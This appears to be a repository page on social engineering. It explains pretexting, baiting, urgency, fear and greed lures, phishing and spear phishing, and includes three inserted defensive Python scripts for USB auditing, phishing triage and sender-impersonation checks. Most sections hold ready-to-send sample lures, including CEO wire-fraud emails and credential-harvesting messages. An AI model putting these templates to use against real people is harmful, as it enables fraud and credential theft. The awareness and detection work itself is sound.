yogsec/cybersecurity-social-engineering
Social Engineering Examples

A collection of real-world social engineering techniques used in cybersecurity, complete with examples and explanations.



🧠 Pretexting – Fake Identity Used to Gain Trust

📌 Description:

Pretexting is a form of social engineering where the attacker fabricates a scenario (pretext) to trick the target into providing information or performing actions they normally wouldn’t. The attacker builds trust using a false identity or story.


🧪 Common Examples of Pretexting:


1. Fake IT Support

Scenario: The attacker calls or emails pretending to be from the internal IT department.

Message:
"Hi, we’re doing urgent system maintenance. Please confirm your login details so we can upgrade your email system."

Result: Victim gives credentials thinking it’s a trusted IT admin.


2. HR or Recruitment Scam

Scenario: The attacker pretends to be from the HR department.

Message:
"We’re updating our employee records. Can you send me your personal details and a copy of your ID for verification?"

Result: The attacker collects sensitive documents such as Social Security numbers and copies of ID documents.


3. Bank Impersonation

Scenario: Attacker pretends to be from the user’s bank.

Message:
"We noticed suspicious activity in your account. We need to verify your identity. Can you confirm your card number and CVV?"

Result: Attacker steals card info for fraud.


4. Journalist or Researcher

Scenario: The attacker acts as a journalist or student doing a study.

Message:
"I’m a student doing a cybersecurity project. Can I ask you a few questions about your company’s infrastructure or network setup?"

Result: Sensitive organizational info is leaked.


5. Fake Delivery or Maintenance Worker

Scenario: The attacker wears a uniform or fakes a work order.

Message:
"I’m here to fix a reported network issue. I need temporary access to your server room."

Result: Gains unauthorized physical access.


6. Executive or Manager Spoof

Scenario: Attacker poses as a senior employee.

Message:
"This is John from Finance. Can you urgently send me the customer list for Q2 reporting?"

Result: Employees comply due to perceived authority.


7. Fake Law Enforcement or Government Agent

Scenario: The attacker impersonates a police officer or auditor.

Message:
"This is Officer Davis. We are conducting a cyber fraud investigation. We need access to your logs and user database."

Result: Victim shares confidential data thinking it’s a legal request.


🎣 Baiting – Social Engineering Technique

Definition:
Baiting is a social engineering technique that lures the victim using a physical or digital "bait"—usually something desirable or intriguing, like free items, leaked content, or insider info. Once the victim interacts with the bait, they unintentionally give the attacker access to their system, credentials, or personal data.


💼 Real-World Examples of Baiting

🔌 1. Infected USB in Parking Lot

An attacker drops multiple USB sticks in a corporate parking area. The drives are labeled “Q4_Bonus_Salaries.pdf” or “HR Reports - Confidential.” A curious employee plugs it into their work laptop — triggering malware that installs a remote access trojan (RAT).


💰 2. Fake Job Offer File

A USB sent to a target via post with a letter saying:
“You're shortlisted for the Senior Security Analyst role. Open the attached portfolio file to confirm your availability.”
The USB launches a keylogger when inserted.


🎮 3. Free Gaming Cheats or Cracks

A bait file posted on a forum promising “Free Valorant Aimbot Hack”. When downloaded and run, it installs spyware and steals gaming credentials or payment data.


💾 4. Free Movie Leak or Celebrity Content

A download link spreading on WhatsApp/Telegram labeled:
“🔞 Leaked Celebrity Video HD.mp4”
Victims download and run it—infecting their system or getting redirected to phishing sites.


💻 5. Infected Public Charging Station (Juice Jacking)

A charging station in an airport or hotel has been modified to install malware when a phone is connected via USB. Victims unknowingly allow data access or malicious code injection.


🧲 6. Online Giveaway Page

A malicious site offering “Free iPhone Giveaway – Enter to Win!”
When the user signs up, they are asked for personal data (phishing) or redirected to malware downloads.


📁 7. File-Sharing Platform Trap

An attacker uploads a malware-laden file to Google Drive or Dropbox with a name like “Company Layoff List 2025.pdf”, then shares the link in employee forums or email groups.


🛡️ Prevention Tips:

  • Don't use untrusted USB drives: Avoid plugging random USBs into your systems.
  • Verify downloads: Only download software and files from reputable sources.
  • Avoid public USB charging ports: Use your own charger and cable, and plug into a power outlet rather than a public USB port.
  • Use antivirus software: Ensure your system has updated antivirus/malware protection.
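
The first prevention tip above (untrusted USB drives) is easier to enforce when removable-storage attachments are audited rather than left to user discretion. The following script is an added example and not part of this repository: it parses constructed kernel log lines (the hostname, timestamps and vendor/product IDs are made up for the example) for USB mass-storage attachments and reports any device whose vendor:product ID is not on an assumed allowlist of company-issued drives.

```python
"""Removable-storage audit over kernel log lines (added example, not repository code)."""
import re

# Assumption: vendor:product IDs of the drives the organisation issues. These
# values are constructed for the example and do not belong to any real device.
ALLOWED = {("abcd", "1234")}

# Kernel lines of the form "usb 1-2: New USB device found, idVendor=..., idProduct=..."
NEW_DEVICE = re.compile(
    r"usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})"
)
# Kernel lines of the form "usb-storage 1-2:1.0: USB Mass Storage device detected"
MASS_STORAGE = re.compile(r"usb-storage (?P<port>[\d.-]+):[\d.]+: USB Mass Storage device detected")


def audit(lines):
    """Return (port, (vid, pid) or None, reason) for every non-allowlisted mass-storage attach."""
    ids = {}      # port -> (vid, pid) seen on the "New USB device found" line
    alerts = []
    for line in lines:
        m = NEW_DEVICE.search(line)
        if m:
            ids[m["port"]] = (m["vid"].lower(), m["pid"].lower())
            continue
        m = MASS_STORAGE.search(line)
        if m:
            vid_pid = ids.get(m["port"])
            if vid_pid is None:
                # Storage class bound before the device was identified: still worth a look.
                alerts.append((m["port"], None, "mass storage without identification line"))
            elif vid_pid not in ALLOWED:
                alerts.append((m["port"], vid_pid, "unapproved removable storage"))
    return alerts


# Constructed sample log: an issued drive on port 1-1, then an unknown drive on port 1-2.
SAMPLE_LOG = """\
Jan 12 09:14:02 wks-17 kernel: usb 1-1: new high-speed USB device number 4 using xhci_hcd
Jan 12 09:14:02 wks-17 kernel: usb 1-1: New USB device found, idVendor=abcd, idProduct=1234, bcdDevice= 1.00
Jan 12 09:14:02 wks-17 kernel: usb-storage 1-1:1.0: USB Mass Storage device detected
Jan 12 09:31:45 wks-17 kernel: usb 1-2: new high-speed USB device number 5 using xhci_hcd
Jan 12 09:31:45 wks-17 kernel: usb 1-2: New USB device found, idVendor=ffff, idProduct=0001, bcdDevice= 2.00
Jan 12 09:31:45 wks-17 kernel: usb-storage 1-2:1.0: USB Mass Storage device detected
"""

if __name__ == "__main__":
    for port, vid_pid, reason in audit(SAMPLE_LOG.splitlines()):
        print(f"ALERT port={port} id={vid_pid} {reason}")
```

The allowlist keys on vendor:product IDs only, which a malicious device can clone, so this is a detection aid for the helpdesk or SIEM, not a substitute for disabling unapproved mass storage at the operating-system level.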

Quid Pro Quo – Exchange-Based Manipulation

Quid Pro Quo (Latin for "something for something") is a social engineering technique where the attacker offers something of value in exchange for sensitive information or access. The attacker creates an illusion of reciprocity, making the victim believe they are receiving a legitimate service or reward in exchange for personal or company data.


⚙️ How It Works

The attacker typically pretends to offer some form of assistance or reward in return for sensitive information. The victim, believing they are getting a beneficial exchange, provides access or personal details that are later used for malicious purposes, such as stealing data, installing malware, or committing fraud.


💡 Examples of Quid Pro Quo Attacks

1. Fake Tech Support Offering Help in Exchange for Access

  • Scenario:
    An attacker calls an employee pretending to be from the company’s IT support team, stating that their computer has been flagged for security issues. The attacker offers to solve the problem remotely if the employee grants access to their machine.

  • Outcome:
    The employee believes they are receiving legitimate support and provides remote access, allowing the attacker to install malware or steal sensitive information.

  • Example Variation:
    "I'm from IT. I can help you get rid of that virus on your computer if you just provide your login credentials for verification."


2. Fake Job Offer for Personal Information

  • Scenario:
    An attacker impersonates a recruiter or HR representative and sends an email offering a job interview. To proceed with the job offer, the attacker asks the victim to fill out a form containing personal information, such as social security numbers or bank details.

  • Outcome:
    The victim, believing they are advancing in a job application process, shares sensitive personal data. The attacker uses this information for identity theft or to conduct further attacks.

  • Example Variation:
    "As part of our hiring process, we need to confirm your bank details for direct deposit purposes. This step will speed up your application."


3. Free Software in Exchange for Login Credentials

  • Scenario:
    An attacker offers free software or an extended trial in exchange for login credentials. To claim the free offer, the victim must provide their company or personal login information.

  • Outcome:
    The victim unknowingly provides login credentials, which the attacker then uses to gain unauthorized access to the system or network.

  • Example Variation:
    "Sign up for this free premium tool, and all we need is your company login credentials for verification. You’ll get a 1-year free license!"


4. Free Wi-Fi Access in Exchange for Login Information

  • Scenario:
    An attacker sets up a fake Wi-Fi hotspot in a public location and offers "free internet access." The victim is prompted to log in through a captive portal, which requests sensitive information such as email and passwords.

  • Outcome:
    The attacker collects the victim’s login credentials or other sensitive data once they log into the fake Wi-Fi network.

  • Example Variation:
    "Get free internet access by logging into our Wi-Fi portal. We just need your name, email, and password to get started."


5. Free Malware Removal in Exchange for System Access

  • Scenario:
    The attacker claims that the victim’s system is infected with malware and offers free help in removing it. The victim is asked to grant remote access to their computer for the “fix.”

  • Outcome:
    Once remote access is granted, the attacker installs additional malware or steals sensitive information from the victim’s system.

  • Example Variation:
    "We’ve noticed unusual activity on your system. Let us help you clean up the malware for free—just let us access your computer remotely for a quick fix."


Authority Exploitation

Description:
Authority exploitation involves impersonating someone in a position of power, such as law enforcement, senior management, or IT personnel, to gain unauthorized access to sensitive information or resources. People are more likely to comply with individuals who appear to have authority, making this one of the most effective social engineering techniques.

Common Authority Exploitation Scenarios

1.1 Impersonating Law Enforcement

  • Scenario: An attacker poses as a law enforcement officer and contacts the HR department, requesting employee records for an ongoing investigation.
  • Example Statement:

    "This is Officer Smith from the local police department. We're conducting an investigation, and we need to verify the identity of John Doe, who works in your HR department. Can you send me his employment records and personal details right away?"

1.2 Impersonating a Senior Manager or Executive (CEO Fraud)

  • Scenario: The attacker impersonates a high-ranking executive, such as the CEO or CFO, to request financial transfers or sensitive company data.
  • Example Email:
    Subject: Urgent – Please Transfer Funds to Vendor ASAP

    "Hi [Employee Name],
    I need you to wire $50,000 to a vendor urgently for an ongoing project. Please prioritize this task and send me a confirmation when done. Regards, [CEO Name]."

1.3 Impersonating a System Administrator

  • Scenario: The attacker calls the IT department pretending to be a system administrator, requesting remote access to address a "security issue."
  • Example Statement:

    "Hi, this is John from the IT support team. We’ve detected unusual activity in your department’s network, and I need to check your system immediately. Please provide me with admin access so I can resolve the issue right away."

1.4 Impersonating a Vendor or Partner

  • Scenario: The attacker poses as a trusted business partner or vendor conducting routine audits or security checks, asking for access to sensitive business systems or documents.
  • Example Phone Call:

    "Hello, I’m Michael from [Vendor Name]. We need to verify some internal systems as part of our quarterly audit. I’ll need access to your project files and some authentication details to complete our review."

1.5 Impersonating a Compliance Officer

  • Scenario: The attacker calls an employee, claiming to be from the company's compliance or legal department, asking for sensitive financial or personal information for an "audit."
  • Example Statement:

    "This is Jennifer from the Compliance Department. We need to verify some tax-related information for your department’s records. Please provide your employee details and tax information immediately for the audit."


Urgency Creation – “Act Fast or Lose Access!” Style Pressure

This social engineering technique relies on creating a sense of urgency to pressure the victim into acting quickly without thinking, which makes them more likely to make mistakes. The attacker plays on the victim's fear of missing out (FOMO) or fear of losing something important.

Here are some examples of Urgency Creation in social engineering:


1. Phishing Email with Account Lock Threat

  • Scenario: You receive an email that claims your account will be locked unless you take immediate action.
  • Example:

    Subject: “URGENT: Your account is about to be suspended!”
    Body:
    Dear User,
    Our system has detected suspicious activity on your account. If you do not respond within the next 24 hours, your account will be permanently suspended. Please click the link below to verify your identity:
    [Click here to verify account].
    Act fast before it's too late!
    Regards,
    [Fake Company Name] Security Team


2. Fake Bank Alert - Immediate Action Required

  • Scenario: An attacker sends a fake bank notification claiming your account has been compromised.
  • Example:

    Subject: “Immediate Action Required: Unusual Transaction Detected on Your Account!”
    Body:
    Dear Customer,
    We have detected unusual activity in your account and suspect it has been compromised. To secure your funds, please log in immediately and confirm your account details. If you don’t respond within 30 minutes, your account will be temporarily locked for security reasons.

    [Log in to secure your account now]


3. Ransomware Threat

  • Scenario: A malicious email warns that your files will be deleted unless you pay a ransom.
  • Example:

    Subject: “Your files are locked – Pay now to restore access!”
    Body:
    Hello,
    Your system has been compromised, and all your important files are encrypted. To regain access, you must pay the ransom within the next 48 hours. Failure to comply will result in permanent data loss.
    Pay the ransom by clicking this link to prevent further loss: [Pay Now].

    Time is running out!


4. Urgent Update Required - Fake Software Update

  • Scenario: An attacker sends a message or notification pretending to be from software support, pressuring the victim to install a malicious update.
  • Example:

    Message:
    “URGENT: Security Update Available!
    Your software is outdated and vulnerable to cyber-attacks. Please update within the next 15 minutes to prevent your data from being exposed. Failure to do so will leave your system vulnerable to hackers.”

    [Click here to download the urgent update].


5. Fake Lottery Win – Claim Your Prize Now!

  • Scenario: A fake lottery or prize-winning scam claims you have won something valuable and urges you to act quickly.
  • Example:

    Subject: “Congratulations! You’ve won a $1,000 Amazon Gift Card!”
    Body:
    You have just won a $1,000 Amazon Gift Card! But you must claim your prize within the next hour or it will be forfeited! To claim your prize, please click the link below and enter your details:
    [Claim Your Prize].

    Hurry, your prize expires soon!


6. Security Breach - Change Password Immediately

  • Scenario: A message or email claims your account has been breached, and you must change your password immediately.
  • Example:

    Subject: “Security Alert: Your Account Has Been Breached”
    Body:
    Dear [Your Name],
    We have detected a security breach in your account. To prevent further unauthorized access, please change your password within the next 10 minutes. If you fail to do so, your account may be locked indefinitely.
    Click here to change your password immediately: [Change Password Now].


7. Tech Support Scam – Immediate Fix Required

  • Scenario: A call or email claiming to be from technical support urges you to act fast to fix a supposed computer issue.
  • Example:

    Phone Call or Email:
    “Hello, this is [Tech Company Name] support. We’ve detected a critical error in your system. Please allow us remote access immediately to fix the problem, or your device will become unusable within 30 minutes. Please call us back urgently at [fake number] to resolve this issue.”


8. Fake Subscription Renewal

  • Scenario: An attacker pretends to be a subscription service (e.g., Netflix, Amazon Prime) and pressures the victim into renewing or paying for a service to avoid cancellation.
  • Example:

    Subject: “Immediate Action Needed: Your Subscription Is About to Expire!”
    Body:
    Dear User,
    Your Netflix subscription is about to expire today! If you don’t renew it within the next hour, you will lose access to all your content. Please click the link below to renew your subscription and enjoy uninterrupted access.
    [Renew Now].


Fear Tactics – Scaring Users into Acting

Fear tactics manipulate users psychologically by creating a sense of urgency or panic that pushes them into hasty decisions. Below are some of the most common fear-based social engineering techniques used in cyberattacks, along with examples.

1. Account Lock/Deactivation Warning

  • Description: Users are warned that their account will be locked or deactivated unless they take immediate action.
  • Example:
    An attacker sends an email disguised as a popular service provider (e.g., a bank, social media) with the subject:
    "URGENT: Your account has been compromised – Immediate action required!"
    The body of the email threatens account deactivation unless the victim clicks on a link to verify their details.

2. Fake Legal Threats

  • Description: Victims are informed that they are under investigation for illegal activity and must resolve the issue immediately.
  • Example:
    A fake email, pretending to be from law enforcement or tax authorities, claims:
    "You are under investigation for tax fraud. Failure to respond will result in arrest and legal consequences."
    The email includes a phone number or link to “contact support.”

3. Ransomware Scare

  • Description: Users are warned that their system has been infected with ransomware and that their files will be deleted unless a ransom is paid.
  • Example:
    A pop-up claims:
    "Your computer is infected with ransomware. Your files will be permanently deleted unless you pay a $500 fee to restore them."
    The user is given a countdown timer to act before the files are allegedly wiped.

4. Fake Tech Support Scams

  • Description: Attackers pose as tech support agents and convince the victim their system has been compromised.
  • Example:
    An attacker calls, claiming to be from the victim's internet service provider (ISP), saying:
    "We’ve detected a serious security breach on your network. If you don’t act immediately, your personal data will be stolen."
    The victim is instructed to download a remote access tool or pay for unnecessary repairs.

5. Financial Loss/Identity Theft Warnings

  • Description: Victims are threatened with financial loss or identity theft if they don’t act immediately.
  • Example:
    An email or SMS reads:
    "ALERT: Suspicious activity detected in your bank account. Your funds will be transferred unless you verify your details within the next 24 hours."
    The user is directed to a fake banking website to enter account information.

6. Cyber Attack/Threat Warning

  • Description: Victims are informed that their system has been compromised by a cyberattack.
  • Example:
    A fake email from “Microsoft Security” warns:
    "ALERT: A hacker has breached your account. Your personal information is at risk. You need to secure your account immediately."
    The email contains a link to a malicious website that asks for login details.

7. Fake Emergency or Family Crisis

  • Description: Attackers create a fake emergency involving a family member, forcing the victim to act quickly.
  • Example:
    An attacker calls, posing as a relative, saying:
    "This is your daughter/son. I’ve been arrested in another country and need money for bail. Please send money right now!"

📚 Greed Triggers – “Win $1,000 Now!” Lures

Greed triggers exploit people's desire to obtain something valuable quickly or with minimal effort. These social engineering tactics promise rewards or winnings to get the victim to take action, often leading to data theft, malware infection, or financial loss.

1. Fake Prize Draws

  • Example 1:
    Message: “Congratulations! You've won a $1,000 gift card! Just click the link to claim your prize.”
    How it works: The victim clicks the link and is asked to enter personal information or payment details to "claim" the prize. The link might also lead to a fake login page that steals credentials.

  • Example 2:
    Message: “You’ve been selected for a special offer worth $1,000. Complete a quick survey to receive your reward!”
    How it works: After filling out the survey, the user is redirected to malicious sites or asked for financial information.

2. Fake Investment Opportunities

  • Example 1:
    Message: “Invest $100 today and get $1,000 within a week. Limited time offer!”
    How it works: A fake cryptocurrency or stock market website is presented. The user deposits money but sees no return, or the website disappears with the funds.

  • Example 2:
    Message: “Guaranteed return on investment – earn up to $1,000 weekly! Don’t miss out!”
    How it works: The attacker entices victims into sending money to an unverified investment account with the promise of high returns.

3. "Limited Time" Offers on Fake E-commerce Sites

  • Example 1:
    Message: “Hurry! Limited time offer – Buy this phone for only $1 and get a free $1,000 voucher for your next purchase.”
    How it works: Victims place an order, but the phone never arrives, and their payment information is stolen in the process.

  • Example 2:
    Message: “Get an iPhone for just $1 today! Click here to get yours before the offer ends!”
    How it works: The victim enters personal information to make the "purchase" but ends up giving up credit card details or downloading malware.

4. Fake Charity Donations

  • Example 1:
    Message: “Help children in need and get a tax rebate of $1,000! Donate now!”
    How it works: A fake charity website convinces the user to donate to a cause that doesn't exist. The donation is stolen, and the victim gains nothing in return.

  • Example 2:
    Message: “Donate $10 to this cause and enter a draw to win $1,000!”
    How it works: Victim donates money to a fake cause, expecting a reward, but the "reward" is nonexistent, and the attacker collects the funds.

5. Fake Job Offers/Recruitment

  • Example 1:
    Message: “Earn $1,000 a week working from home! Click here to apply now!”
    How it works: The user is led to a job application form that asks for personal information and sometimes payment for “background checks” or “training fees.”

  • Example 2:
    Message: “Start your own business for just $99, and earn $1,000 per day. Limited spots available!”
    How it works: Victims pay to access what seems like a business opportunity but end up receiving little to no value in return.


Phishing – Generic Fake Emails

Phishing is one of the most common social engineering attacks: attackers send fraudulent emails that appear to come from trusted sources in order to steal sensitive information such as usernames, passwords, or credit card details.

Examples of Phishing Emails:


Example 1: Fake Bank Alert

Subject: URGENT: Your Account Has Been Suspended

Body:

Dear Valued Customer,

We have noticed unusual activity in your account. To ensure the security of your account, we have temporarily suspended it. Please click the link below to confirm your account details and restore full access.

[Restore Account] – www.fakebank-link.com

If you do not respond within 24 hours, your account will be permanently suspended.

Thank you for your understanding.

Best regards, Fake Bank Security Team

Why it's phishing: The urgency and fake "security alert" make the user feel pressured to act fast, leading them to enter sensitive information on a fake website.


Example 2: Fake Shipping Notification

Subject: Your Package is Waiting for Delivery!

Body:

Dear Customer,

We are unable to deliver your package due to an incomplete address. Please click the link below to update your shipping information and ensure your package is delivered within the next 48 hours.

[Update Shipping Info] – www.fake-shipping.com

Failure to provide updated details will result in the return of your package.

Thank you, Fake Shipping Service

Why it's phishing: The attacker uses the fake shipping notification to convince the target to click a link and submit personal details.


Example 3: Fake Account Verification

Subject: Action Required: Verify Your Account

Body:

Dear User,

We noticed that you have not verified your account. To ensure uninterrupted access, please click the link below to complete your verification.

[Verify Account Now] – www.fake-verify-site.com

Failure to verify your account within 48 hours will result in a temporary lock.

Thank you, Fake Online Platform Support Team

Why it's phishing: It creates a false sense of urgency and tricks the user into entering their login credentials on a fraudulent site.


Example 4: Fake Invoice Notification

Subject: Invoice #12345 – Payment Due

Body:

Dear [Your Name],

Attached is the invoice for the recent service rendered. Kindly process the payment as soon as possible to avoid any late fees. You can download the invoice by clicking the link below.

[Download Invoice] – www.fake-invoice.com

If you have any questions, feel free to contact our billing department.

Best regards, Fake Billing Department

Why it's phishing: The attacker uses a common tactic where an “invoice” is sent with a link that contains malware or a phishing site to steal financial details.


Example 5: Fake Social Media Login

Subject: Important: Your Social Media Account is Inactive

Body:

Dear [User],

We’ve noticed that your social media account has been inactive for over 30 days. To reactivate it, please verify your login details by clicking the link below:

[Reactivate Account] – www.fake-social-media.com

Please note that if you don't reactivate within 48 hours, your account may be permanently deleted.

Best, Fake Social Media Team

Why it's phishing: The email mimics a social media platform’s notification to steal login credentials.


Example 6: Fake Tech Support Alert

Subject: Immediate Attention Required: System Update Needed

Body:

Dear User,

Our system has detected a critical issue with your computer. Please click the link below to run an urgent update and prevent further damage to your system.

[Download System Update] – www.fake-tech-support.com

If you don't act now, your device may become vulnerable to hackers.

Sincerely, Fake Tech Support Team

Why it's phishing: The attacker pretends to be a tech support team, directing the victim to download malware disguised as an update.


Example 7: Fake Prize Notification

Subject: Congratulations! You've Won a Gift Card!

Body:

Dear Winner,

Congratulations! You have been selected to receive a $500 gift card. To claim your prize, please click the link below and fill in your contact details.

[Claim Your Gift Card] – www.fake-giftcard.com

Hurry, this offer is only available for the next 24 hours!

Best regards, Fake Prize Team
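
The lures in the Urgency Creation, Fear Tactics, Greed Triggers and Phishing sections above share three signals that a mail gateway or triage script can check mechanically: pressure language, a request for credentials, card or bank data (or the promise of a prize), and links whose domain does not match the sender's domain. The following Python script is an added example and not code from this repository; it runs those rules over two constructed sample messages (modelled on "Example 1: Fake Bank Alert" and a benign internal notice, with all domains under the reserved .example/.com example names). The keyword lists and the two-signal threshold are assumptions of this example, not a published standard.

```python
"""Rule-based phishing triage over sample messages (added example, not repository code)."""
import re
from dataclasses import dataclass
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Pressure language of the kind shown in the Urgency Creation and Fear Tactics sections.
URGENCY = re.compile(
    r"\b(?:urgent(?:ly)?|immediate(?:ly)?|act (?:fast|now)|hurry|"
    r"within (?:the next )?\d+ (?:minutes?|hours?)|permanently (?:suspended|deleted|locked)|"
    r"before it'?s too late)\b",
    re.I,
)
# Requests for secrets or money: the payload of a credential-harvesting mail.
SENSITIVE = re.compile(
    r"\b(?:password|login (?:details|credentials)|card number|cvv|bank details|"
    r"verify your (?:identity|account|details)|confirm your (?:account|card|login))\b",
    re.I,
)
# Rewards dangled in front of the reader (Greed Triggers section).
REWARD = re.compile(
    r"\b(?:you(?:'ve| have) won|claim your (?:prize|gift card|reward)|free (?:iphone|gift card))\b",
    re.I,
)
URL = re.compile(r"(?:https?://|www\.)[\w.-]+(?:/[^\s\]]*)?", re.I)


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels): adequate for triage, not for an enforcement policy."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


@dataclass
class Triage:
    sender_domain: str
    link_domains: list
    reasons: list

    @property
    def suspicious(self) -> bool:
        # Two independent signals is the threshold; any one alone is common in legitimate mail.
        return len(self.reasons) >= 2


def triage(raw: str) -> Triage:
    """Score one RFC 822-style message (headers, blank line, body) and list the reasons."""
    msg = message_from_string(raw)
    _, addr = parseaddr(msg.get("From", ""))
    sender_domain = registrable(addr.rsplit("@", 1)[-1]) if "@" in addr else ""
    text = f"{msg.get('Subject', '')}\n{msg.get_payload()}"
    reasons = []
    if URGENCY.search(text):
        reasons.append("urgency/fear language")
    if SENSITIVE.search(text):
        reasons.append("asks for credentials, card or bank data")
    if REWARD.search(text):
        reasons.append("promises a prize or reward")
    link_domains = []
    for u in URL.findall(text):
        host = urlparse(u if u.lower().startswith("http") else "http://" + u).hostname or ""
        link_domains.append(registrable(host))
    if any(d != sender_domain for d in link_domains):
        reasons.append("link domain differs from sender domain")
    return Triage(sender_domain, link_domains, reasons)


# Constructed sample modelled on "Example 1: Fake Bank Alert"; the domains are not real.
PHISH = """From: "Fake Bank Security Team" <security@bank-alerts.example>
Subject: URGENT: Your Account Has Been Suspended

Dear Valued Customer,
We have noticed unusual activity in your account and have temporarily suspended it.
Please click the link below to confirm your account details and restore full access.
[Restore Account] - www.fakebank-link.example/restore
If you do not respond within 24 hours, your account will be permanently suspended.
"""

# Constructed benign internal notice for comparison.
BENIGN = """From: Priya <priya@example.com>
Subject: All-hands on Thursday

Hi team, the quarterly all-hands is on Thursday at 3pm in the main hall.
Slides are at https://intranet.example.com/allhands. Thanks, Priya
"""

if __name__ == "__main__":
    for name, sample in (("phish", PHISH), ("benign", BENIGN)):
        t = triage(sample)
        print(name, "SUSPICIOUS" if t.suspicious else "ok", t.reasons)
```

Keyword rules like these catch the bulk of mass-produced lures but are easy to evade with rewording, so in practice they are one input to a score alongside sender authentication (SPF/DKIM/DMARC results) and URL reputation, not the sole verdict.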


Spear Phishing: Targeted, Personalized Emails

Definition:
Spear phishing is a highly targeted form of phishing where an attacker customizes the email to a specific individual or organization. Unlike generic phishing attacks, spear phishing is tailored with personal details, making it more convincing.

🎯 Key Characteristics of Spear Phishing:

  • Personalized Information: The attacker gathers details about the victim (e.g., name, job title, work relationships) through social media, company websites, or other OSINT sources.
  • Trust Exploitation: The email might appear to come from someone the victim knows, such as a colleague, boss, or service provider.
  • Goal: Usually, the aim is to steal login credentials, financial information, or to convince the target to click on malicious links or download attachments.

📧 Examples of Spear Phishing Emails


1. Example: HR-related Attack

  • Subject: "Action Required: Employee Benefits Enrollment"
  • From: “HR Department” (hr@company.com)
  • Body:

Dear John Doe,

This is a reminder that your benefits enrollment is due for this year. Please review your current coverage and select your preferences by following the link below.

Click here to update your information: [Malicious Link]

If you do not make any changes by the end of this month, your benefits will be automatically renewed.

Regards, HR Department

How It Works:

  • The attacker uses a name from the target's organization to make the email look legitimate.
  • The link leads to a fake HR portal designed to capture login credentials.

2. Example: CEO Fraud

  • Subject: “Urgent Request - Immediate Action Required”
  • From: “CEO” (ceo@company.com)
  • Body:

Hi Sarah,

I need you to process an urgent wire transfer of $50,000 to the vendor as soon as possible. Please use the banking details I’ve shared below. Time is of the essence, and I trust you’ll handle this promptly.

Bank Account: [Fake Account Information]

Let me know once it's done.

Thanks, James (CEO)

How It Works:

  • The attacker impersonates the CEO and requests a high-value wire transfer.
  • It relies on the victim trusting the sender and acting quickly without verifying.

3. Example: IT Department Impersonation

Dear Mark,

We’ve detected unusual activity on your account, and for your security, your password must be updated immediately. Please follow the link below to change your password:

[Malicious Link]

If you do not reset your password within 24 hours, your account will be locked.

Regards, IT Support Team

How It Works:

  • The attacker impersonates the IT support team and creates a sense of urgency.
  • The link leads to a fake login page designed to steal the user’s credentials.

4. Example: Vendor Invoice

  • Subject: “Invoice for Services Rendered - Payment Due”
  • From: “Vendor Name” (vendor@company.com)
  • Body:

Dear Michael,

I hope this email finds you well. Attached is the invoice for the services provided last week. Kindly review it and process payment by the end of the week.

Invoice: [Fake Invoice Attachment]

How It Works:

  • The attacker impersonates a legitimate vendor and includes an attachment that contains malware or prompts the victim to click on malicious links.
  • The victim might trust the invoice if the attacker has researched the company’s vendors.

5. Example: Customer Support Phishing

  • Subject: “Account Suspension Notice”
  • From: “Customer Support” (support@company.com)
  • Body:

Dear Emma,

We noticed that there was an issue with your recent purchase. Your account will be suspended unless we can confirm your payment information.

Please update your billing details as soon as possible by clicking the link below:

[Fake Payment Page Link]

Thank you for your prompt attention to this matter.

Best regards, Customer Support Team

How It Works:

  • The attacker creates a sense of urgency and uses the victim’s name to build trust.
  • The malicious link leads to a fake login or payment page to steal payment details.
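
Every spear-phishing example above borrows a name or role the recipient already trusts (CEO, HR Department, IT Support Team, Customer Support). A common defensive control is display-name impersonation protection: keep a list of the real mailboxes behind those identities and flag any message whose From display name claims one of them while its address is not the registered one. The script below is an added example, not code from this repository; the organisation domain, the protected identities and their addresses are assumptions made up for the example. It goes one step beyond the text by also flagging sender domains within a small edit distance of the organisation's own domain, the usual way an external impersonator makes an address look internal.

```python
"""Display-name impersonation check for From headers (added example, not repository code)."""
import re
from email.utils import parseaddr

ORG_DOMAIN = "example.com"  # assumption: the defender's own mail domain

# Assumption: the real mailboxes behind the identities attackers like to borrow.
# Names and addresses are constructed for this example.
PROTECTED = {
    "james okafor": "james.okafor@example.com",  # hypothetical CEO
    "ceo": "james.okafor@example.com",
    "hr department": "hr@example.com",
    "it support team": "it-support@example.com",
    "customer support": "support@example.com",
}


def claimed_identities(display_name: str) -> dict:
    """Return the protected identities a display name asserts (whole-word match)."""
    norm = " " + " ".join(re.sub(r"[^a-z0-9]+", " ", display_name.lower()).split()) + " "
    return {k: v for k, v in PROTECTED.items() if f" {k} " in norm}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot lookalike domains such as examp1e.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_sender(from_header: str) -> list:
    """Return a list of findings for one From header; empty means nothing suspicious."""
    name, addr = parseaddr(from_header)
    addr = addr.lower()
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    findings = []
    claims = claimed_identities(name)
    if claims and addr not in set(claims.values()):
        findings.append(f"display name '{name}' claims {', '.join(claims)} but address is {addr}")
    if domain and domain != ORG_DOMAIN and 0 < edit_distance(domain, ORG_DOMAIN) <= 2:
        findings.append(f"lookalike domain {domain} (edit distance "
                        f"{edit_distance(domain, ORG_DOMAIN)} from {ORG_DOMAIN})")
    return findings


if __name__ == "__main__":
    # Constructed headers: the genuine CEO, a lookalike-domain impersonation,
    # an external sender posing as HR, and an ordinary colleague.
    for hdr in ('"James (CEO)" <james.okafor@example.com>',
                '"James (CEO)" <james.okafor@examp1e.com>',
                '"HR Department" <hr@company-mail.example>',
                "Priya <priya@example.com>"):
        print(hdr, "->", check_sender(hdr) or "ok")
```

Mail platforms ship equivalent controls (impersonation protection, external-sender tagging); the value of a script like this is in review of gateway logs or in a SOC playbook where the analyst wants to see exactly which claimed identity and which address triggered the alert.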

Curiosity Traps

Description:
Curiosity traps exploit natural human curiosity. Attackers craft intriguing or alarming subject lines to trick users into clicking links. The goal is to trigger a knee-jerk "find out more" response before the recipient critically evaluates the content.

Examples of Curiosity Traps:

1. Video of You

  • Subject Line:
    "This video of you is hilarious! Check it out!"
  • Description:
    Victims are likely to click on the link, thinking it's a funny or embarrassing video of themselves, but it could lead to a phishing page or malware download.

